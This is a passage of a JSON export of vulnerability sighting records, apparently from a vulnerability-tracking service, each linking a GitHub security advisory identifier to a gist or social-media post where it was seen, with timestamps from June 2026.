"content": "", "creation_timestamp": "2026-06-02T08:18:23.261904Z"}, {"uuid": "7fa5c939-a6de-430f-a26a-ecec60d775f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5xrq-8626-4rwp", "type": "seen", "source": "https://gist.github.com/kameking-lab/efb68ee24b485f78790081797ce23d44", "content": "", "creation_timestamp": "2026-06-02T13:34:19.000000Z"}, {"uuid": "542d8a26-6415-4c28-b1cd-a3c87f2a28aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9392-pj54-qqf8", "type": "seen", "source": "https://gist.github.com/alon710/8d83dcf8c5f6eaceac335292cf54a077", "content": "", "creation_timestamp": "2026-06-04T19:40:55.000000Z"}, {"uuid": "7f0470b9-d49e-49a3-be17-34f4ff142f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v6wp-4m6f-gcjg", "type": "seen", "source": "https://gist.github.com/xinhongwang138-hue/6b83f89fed135d1aad9c8de5c574e471", "content": "", "creation_timestamp": "2026-06-05T08:53:16.000000Z"}, {"uuid": "4e7e5ff3-7281-4727-8c96-e20d007874c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-67v7-3g49-mxh2", "type": "seen", "source": "https://gist.github.com/pseudo7777/6fb3ec2f8f5b760f09161e11ad328b2f", "content": "", "creation_timestamp": "2026-06-09T19:20:17.000000Z"}, {"uuid": "1d800ace-63ca-465e-9081-faae72339e7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8xx5-h6m3-jr33", "type": "seen", "source": "https://gist.github.com/pseudo7777/6fb3ec2f8f5b760f09161e11ad328b2f", "content": "", "creation_timestamp": "2026-06-09T19:20:17.000000Z"}, {"uuid": "f579e230-4eb7-43f8-8947-a4411b1d3473", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-283w-xf3q-788v", "type": "seen", "source": "https://gist.github.com/pseudo7777/6fb3ec2f8f5b760f09161e11ad328b2f", "content": "", "creation_timestamp": "2026-06-09T19:20:17.000000Z"}, {"uuid": "f3d1b0df-60b9-4aaa-95b7-533d1c3cfd8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35pf-37c6-jxjv", "type": "seen", "source": "https://gist.github.com/pseudo7777/6fb3ec2f8f5b760f09161e11ad328b2f", "content": "", "creation_timestamp": "2026-06-09T19:20:17.000000Z"}, {"uuid": "498ced45-0189-4d9e-a578-77432f404d9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w9f3-qc75-qgx9", "type": "seen", "source": "https://gist.github.com/pseudo7777/6fb3ec2f8f5b760f09161e11ad328b2f", "content": "", "creation_timestamp": "2026-06-09T19:20:17.000000Z"}, {"uuid": "decc7775-e8d3-43a7-875d-5ddb3ce3f5a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7QJX-GP9H-65QJ", "type": "seen", "source": "https://gist.github.com/alon710/663cf40e16b6dd064b1d29749e82124d", "content": "", "creation_timestamp": "2026-06-09T22:11:08.000000Z"}, {"uuid": "0d461f14-bbdf-4dca-b678-092a11467369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mrhx-6pw9-q5fh", "type": "seen", "source": "https://gist.github.com/alon710/f640ae703fe7932b0c10bae26e654477", "content": "", "creation_timestamp": "2026-06-09T22:51:34.000000Z"}, {"uuid": "800cdb9c-dcf1-45fc-b796-3dc0a2f8817c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-833p-95jq-929q", "type": "seen", "source": "https://gist.github.com/alon710/c5822daca832e3ff7c46650aefcc77c9", "content": "", "creation_timestamp": "2026-06-09T23:11:25.000000Z"}, {"uuid": "a78f0940-1513-46a6-ba80-bd08987fd438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-55hg-8qxv-qj4p", "type": "seen", "source": "https://gist.github.com/alon710/8fd39736c139424c0b6f1dacb91f586a", "content": "", "creation_timestamp": "2026-06-09T23:41:37.000000Z"}, {"uuid": "3dbbef32-89da-4867-869f-3ff58364af01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-010", "type": "seen", "source": "https://bsky.app/profile/test-cvp.bsky.social/post/3mnw7yrxsbg2i", "content": "", "creation_timestamp": "2026-06-10T07:49:59.693949Z"}, {"uuid": "f25ca7eb-8d42-4e74-b02d-c42586dc312e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-62wx-5f55-w8g2", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mnwbp5imih22", "content": "", "creation_timestamp": "2026-06-10T08:20:23.465591Z"}, {"uuid": "8f688c63-f871-4bbc-ab4f-d18861c4dca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8hg8-63c5-gwmx", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mo44dsnzdc2y", "content": "", "creation_timestamp": "2026-06-12T16:00:32.576061Z"}, {"uuid": "47b4719b-0874-433e-b702-5de93308c3d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-45qj-4xq3-3c45", "type": "seen", "source": "https://gist.github.com/sandh0t/45fdee24a7907e0cd836aed26f2d5a7a", "content": "", "creation_timestamp": "2026-06-12T18:22:18.000000Z"}, {"uuid": "718c17ae-c243-4622-9c05-884943236d49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-232v-j27c-5pp6", "type": "seen", "source": "https://gist.github.com/sandh0t/02a08b8bb92781def27062b182bc401b", "content": "", "creation_timestamp": "2026-06-12T18:31:30.000000Z"}, {"uuid": "cb1c3dee-fa80-45b3-9b09-3b0e93a9a38a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7f8r-222p-6f5g", "type": "seen", "source": "https://gist.github.com/sandh0t/02a08b8bb92781def27062b182bc401b", "content": "", "creation_timestamp": "2026-06-12T18:31:30.000000Z"}, {"uuid": "aeb7a7ff-8a72-4293-983b-7895e650a950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-777c-7fjr-54vf", "type": "seen", "source": "https://gist.github.com/konard/f83ae7aaab029a650fe9054d8205dac4", "content": "", "creation_timestamp": "2026-06-12T20:38:57.000000Z"}, {"uuid": "2c2de42d-e5ee-43cc-84d3-71e640c0abe2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/f83ae7aaab029a650fe9054d8205dac4", "content": "", "creation_timestamp": "2026-06-12T20:38:57.000000Z"}, {"uuid": "ed1bbdc7-b9d2-48c5-927e-a9d3ada19fa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p92q-9vqr-4j8v", "type": "seen", "source": "https://gist.github.com/konard/f83ae7aaab029a650fe9054d8205dac4", "content": "", "creation_timestamp": "2026-06-12T20:38:57.000000Z"}, {"uuid": "7bc0f89c-75d5-4598-8de7-f33292b0ed39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35jp-ww65-95wh", "type": "seen", "source": "https://gist.github.com/konard/f83ae7aaab029a650fe9054d8205dac4", "content": "", "creation_timestamp": "2026-06-12T20:38:57.000000Z"}, {"uuid": "73620620-343c-478a-8295-9c4558ecc28c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j5f8-grm9-p9fc", "type": "seen", "source": "https://gist.github.com/konard/f83ae7aaab029a650fe9054d8205dac4", "content": "", "creation_timestamp": "2026-06-12T20:38:57.000000Z"}, {"uuid": "13a223aa-f52d-4f52-9ff0-3d4e7576fd6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3g43-6gmg-66jw", "type": "seen", "source": "https://gist.github.com/konard/f83ae7aaab029a650fe9054d8205dac4", "content": "", "creation_timestamp": "2026-06-12T20:38:57.000000Z"}, {"uuid": "4ff77b40-911b-4d29-a6f8-a7aee5237cf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pv9g-rrhq-mpqc", "type": "seen", "source": "https://mastodon.bsd.cafe/users/grahamperrin/statuses/116741102400640422", "content": "", "creation_timestamp": "2026-06-13T05:17:38.438761Z"}, {"uuid": "476dcd95-50c6-42e1-a1b3-0129c670b4d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/10edfaf46f7ba58bdd3e22a15167f9bc", "content": "", "creation_timestamp": "2026-06-13T16:40:27.000000Z"}, {"uuid": "9964cae1-f48d-4ef6-aaa9-719eaacdcdd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rq4-664w-9x2c", "type": "seen", "source": "https://gist.github.com/konard/10edfaf46f7ba58bdd3e22a15167f9bc", "content": "", "creation_timestamp": "2026-06-13T16:40:27.000000Z"}, {"uuid": "f6e05f16-68ea-490a-b66c-9fdab2dff2f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5xrq-8626-4rwp", "type": "seen", "source": "https://gist.github.com/konard/10edfaf46f7ba58bdd3e22a15167f9bc", "content": "", "creation_timestamp": "2026-06-13T16:40:27.000000Z"}, {"uuid": "1a049382-900a-49a1-a689-1ebf4928c984", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/konard/10edfaf46f7ba58bdd3e22a15167f9bc", "content": "", "creation_timestamp": "2026-06-13T16:40:27.000000Z"}, {"uuid": "0b058a70-832a-4620-9468-96b5e3980f40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/63352670c92fae53a05fc19d03ab62cd", "content": "", "creation_timestamp": "2026-06-13T16:54:05.000000Z"}, {"uuid": "d6c8b780-fc23-46ed-8206-63e80c1c36fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rq4-664w-9x2c", "type": "seen", "source": "https://gist.github.com/konard/63352670c92fae53a05fc19d03ab62cd", "content": "", "creation_timestamp": "2026-06-13T16:54:05.000000Z"}, {"uuid": "6f2612b2-9324-430a-ba44-e139207ba244", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5xrq-8626-4rwp", "type": "seen", "source": "https://gist.github.com/konard/63352670c92fae53a05fc19d03ab62cd", "content": "", "creation_timestamp": "2026-06-13T16:54:05.000000Z"}, {"uuid": "2ca1c7ea-fee3-4fb7-ae7b-f470b972eee8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/konard/63352670c92fae53a05fc19d03ab62cd", "content": "", "creation_timestamp": "2026-06-13T16:54:05.000000Z"}, {"uuid": "cd2185f8-479d-4dfe-86c7-ddaa3e20e89b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/45074c1dd2843695702a5ff8232cdcc3", "content": "", "creation_timestamp": "2026-06-13T17:11:57.000000Z"}, {"uuid": "0c6b9a58-75c8-486c-aeeb-a7cba9815f2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rq4-664w-9x2c", "type": "seen", "source": "https://gist.github.com/konard/45074c1dd2843695702a5ff8232cdcc3", "content": "", "creation_timestamp": "2026-06-13T17:11:57.000000Z"}, {"uuid": "81564975-c2ca-4667-ad51-7315f1a5bda0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5xrq-8626-4rwp", "type": "seen", "source": "https://gist.github.com/konard/45074c1dd2843695702a5ff8232cdcc3", "content": "", "creation_timestamp": "2026-06-13T17:11:57.000000Z"}, {"uuid": "352d512f-3853-42eb-895a-1ac423d90311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/konard/45074c1dd2843695702a5ff8232cdcc3", "content": "", "creation_timestamp": "2026-06-13T17:11:57.000000Z"}, {"uuid": "cc12cad3-2817-440b-8a52-18b5377c68bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7r4-m6w7-qqqr", "type": "seen", "source": "https://gist.github.com/konard/1a769ec3dc69d16ca04094fc51ca92c0", "content": "", "creation_timestamp": "2026-06-13T17:18:42.000000Z"}, {"uuid": "cfb4dda9-304c-431e-a805-ccc0a7904e08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/1a769ec3dc69d16ca04094fc51ca92c0", "content": "", "creation_timestamp": "2026-06-13T17:18:42.000000Z"}, {"uuid": "fc0acd79-d1da-4f4f-af64-c616a08ee0b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://gist.github.com/konard/8c3e52dfd7019783fb2c7f9392d36d2c", "content": "", "creation_timestamp": "2026-06-13T19:28:58.000000Z"}, {"uuid": "4a137d7d-2ba5-41f2-aa30-0e89ff5fad2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-48c2-rrv3-qjmp", "type": "seen", "source": "https://gist.github.com/konard/8c3e52dfd7019783fb2c7f9392d36d2c", "content": "", "creation_timestamp": "2026-06-13T19:28:58.000000Z"}, {"uuid": "de7b790e-37e4-402f-837b-146c5ae27ba5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-92pp-h63x-v22m", "type": "seen", "source": "https://gist.github.com/konard/8c3e52dfd7019783fb2c7f9392d36d2c", "content": "", "creation_timestamp": "2026-06-13T19:28:58.000000Z"}, {"uuid": "634553d8-864f-4c1d-a51d-b07f87a93080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p68-rc4w-qgx5", "type": "seen", "source": "https://gist.github.com/konard/8c3e52dfd7019783fb2c7f9392d36d2c", "content": "", "creation_timestamp": "2026-06-13T19:28:58.000000Z"}, {"uuid": "a50f1693-942c-4aa2-a0ef-668a873ac2c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hf8c-xr89-vfm5", "type": "seen", "source": "https://gist.github.com/sandh0t/c90fa97b087db012f816b8cb67a68ff3", "content": "", "creation_timestamp": "2026-06-14T13:12:45.000000Z"}, {"uuid": "10aa0997-ba14-47e6-9dab-bb94123d234a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7w-rqvm-qjhr", "type": "seen", "source": "https://bsky.app/profile/schalkneethling.com/post/3mobegzhet22k", "content": "", "creation_timestamp": "2026-06-14T18:08:51.735149Z"}, {"uuid": "5eff13c2-080a-462c-9d97-10d528945594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8JR5-V98P-W75M", "type": "seen", "source": "https://gist.github.com/alon710/91c849a1a0fb4322b56402af2c5bb804", "content": "", "creation_timestamp": "2026-06-17T14:41:27.000000Z"}, {"uuid": "04ebecaa-66fe-475b-8d35-a9506d0fe631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-76g7-m3xw-x9gr", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3moijz2guqe2k", "content": "", "creation_timestamp": "2026-06-17T14:37:01.100023Z"}, {"uuid": "4d2f656d-be80-41bd-b516-8c59e2bd2995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rjxq-qqhf-8hwh", "type": "seen", "source": "https://gist.github.com/alon710/419f4d41351693c7c60ff49637269f97", "content": "", "creation_timestamp": "2026-06-17T18:11:20.000000Z"}, {"uuid": "dbe4b166-2b6e-4a8f-91d0-4493c71f4a50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mx8g-39q3-5c79", "type": "seen", "source": "https://gist.github.com/alon710/3232f2e304614604da98b70a9e646950", "content": "", "creation_timestamp": "2026-06-17T18:51:46.000000Z"}, {"uuid": "776769ac-b4fe-42b2-8631-90a1231e55f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72gw-mp4g-v24j", "type": "seen", "source": "https://gist.github.com/alon710/e8e930bfaf0a04644c5861c1af92ed10", "content": "", "creation_timestamp": "2026-06-17T19:41:25.000000Z"}, {"uuid": "e1d42140-3982-4ffb-a343-784f52a2cc1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-47qp-hqvx-6r3f", "type": "seen", "source": "https://gist.github.com/alon710/adfa7aacc3b80320d7d38d47591141d2", "content": "", "creation_timestamp": "2026-06-18T13:41:25.000000Z"}, {"uuid": "e5b4c8b5-e8a9-4c56-be2e-738dfe95ce78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-47qp-hqvx-6r3f", "type": "seen", "source": "https://gist.github.com/alon710/1009ff77420ca2d3dfc49ca0eb601808", "content": "", "creation_timestamp": "2026-06-18T14:01:20.000000Z"}, {"uuid": "352d5ed0-53ef-4ebd-8c57-f2aa30957df5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WM69-2PC3-RMMF", "type": "seen", "source": "https://gist.github.com/alon710/828a99d5b9580f4196005661c9b07d2d", "content": "", "creation_timestamp": "2026-06-18T17:41:53.000000Z"}, {"uuid": "da488886-ad05-4f46-9fbd-4151565c907b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R253-R9JW-QG44", "type": "seen", "source": "https://gist.github.com/alon710/3807d480d537cf9538209dc130bd58ae", "content": "", "creation_timestamp": "2026-06-18T18:51:38.000000Z"}, {"uuid": "4ecc37c9-8456-4192-8be4-17403b3ad09b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R253-R9JW-QG44", "type": "seen", "source": "https://gist.github.com/alon710/41babc051db96b1507f3fb804d7012be", "content": "", "creation_timestamp": "2026-06-18T18:41:53.000000Z"}, {"uuid": "135c719d-446b-426e-b8f4-8a6815358bed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R253-R9JW-QG44", "type": "seen", "source": "https://gist.github.com/alon710/697bceac18bae3cc319e1ba354c5f8bd", "content": "", "creation_timestamp": "2026-06-18T19:02:49.000000Z"}, {"uuid": "5ee857bc-7eeb-4719-9f7b-82fb8ac41b79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R253-R9JW-QG44", "type": "seen", "source": "https://gist.github.com/alon710/9e535e41085b7a2a9ed1e2ab38f56b56", "content": "", "creation_timestamp": "2026-06-18T19:21:43.000000Z"}, {"uuid": "7abe9857-2f71-4a9a-ad50-eb0b0de38832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2jq4-q6vv-4cp3", "type": "seen", "source": "https://gist.github.com/alon710/2aa5fa13eea204ffabb0321701e9195f", "content": "", "creation_timestamp": "2026-06-18T19:21:43.000000Z"}, {"uuid": "8339c839-a7b2-4ab7-9d12-fac86d81caba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2jq4-q6vv-4cp3", "type": "seen", "source": "https://gist.github.com/alon710/2a767af5c208a82e89707e10b62dcf61", "content": "", "creation_timestamp": "2026-06-18T19:11:23.000000Z"}, {"uuid": "564f3e0a-578a-4614-ad18-a8d5ab490f4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R253-R9JW-QG44", "type": "seen", "source": "https://gist.github.com/alon710/8121a7bd1aab2652430c302c53a0527a", "content": "", "creation_timestamp": "2026-06-18T19:11:23.000000Z"}, {"uuid": "e5efcc02-4e2d-422b-b4d3-de19c9c20e4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QQF5-X7MJ-V43P", "type": "seen", "source": "https://gist.github.com/alon710/61d74af534dcdd96aec9286f239a170e", "content": "", "creation_timestamp": "2026-06-18T19:42:11.000000Z"}, {"uuid": "8ae023ca-449e-49da-b9a9-f8e9669875cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gfj5-979r-92pw", "type": "seen", "source": "https://gist.github.com/alon710/ddadbe26c2841109bcde2cf3e1d364b2", "content": "", "creation_timestamp": "2026-06-18T20:11:22.000000Z"}, {"uuid": "eefbd50b-82c6-4fea-9e80-367f91946b83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rjxq-qqhf-8hwh", "type": "seen", "source": "https://gist.github.com/alon710/4e321e5dcf74a8eaf0f99d54a40035e9", "content": "", "creation_timestamp": "2026-06-18T20:02:03.000000Z"}, {"uuid": "525cd529-e4f1-4180-ac8f-33f757cdb780", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gfj5-979r-92pw", "type": "seen", "source": "https://gist.github.com/alon710/fd355e480f025edd956fae7107a02df9", "content": "", "creation_timestamp": "2026-06-18T20:22:11.000000Z"}, {"uuid": "9f1379fa-cd1b-40e9-b64d-29b25bf3eb0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5739-39v2-5754", "type": "seen", "source": "https://gist.github.com/alon710/c128a0f63af7d1e750d123d65278758d", "content": "", "creation_timestamp": "2026-06-18T22:41:42.000000Z"}, {"uuid": "ed64b76c-6be5-4a3d-b91b-e1de97596c26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jc38-x7x8-2xc8", "type": "seen", "source": "https://gist.github.com/alon710/c26988bce97f88a79fd114238aa121f6", "content": "", "creation_timestamp": "2026-06-18T23:11:33.000000Z"}, {"uuid": "05100484-b50a-44c0-9d37-0c52cf8cddb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3PRJ-6HQW-CM82", "type": "seen", "source": "https://gist.github.com/alon710/ffff1d4eb6033a732c872d3aa4694b89", "content": "", "creation_timestamp": "2026-06-19T01:11:33.000000Z"}, {"uuid": "b5ca895b-50a3-4818-90d3-c2b822899169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6VVH-PXR4-25R7", "type": "seen", "source": "https://gist.github.com/alon710/b1b22df575bfbbf1e201aedc3467bcba", "content": "", "creation_timestamp": "2026-06-19T01:51:20.000000Z"}, {"uuid": "2ceb7d6a-cd06-40f9-a466-bd120001f860", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6VVH-PXR4-25R7", "type": "seen", "source": "https://gist.github.com/alon710/f3e92e03dae92147bc7c79e5359c6c2b", "content": "", "creation_timestamp": "2026-06-19T01:41:43.000000Z"}, {"uuid": "f74dd528-8663-4f07-a0cf-959951b4d7de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", 